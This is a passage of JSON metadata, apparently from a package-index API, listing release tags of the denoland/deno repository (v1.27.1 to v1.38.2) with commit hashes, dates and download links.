s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.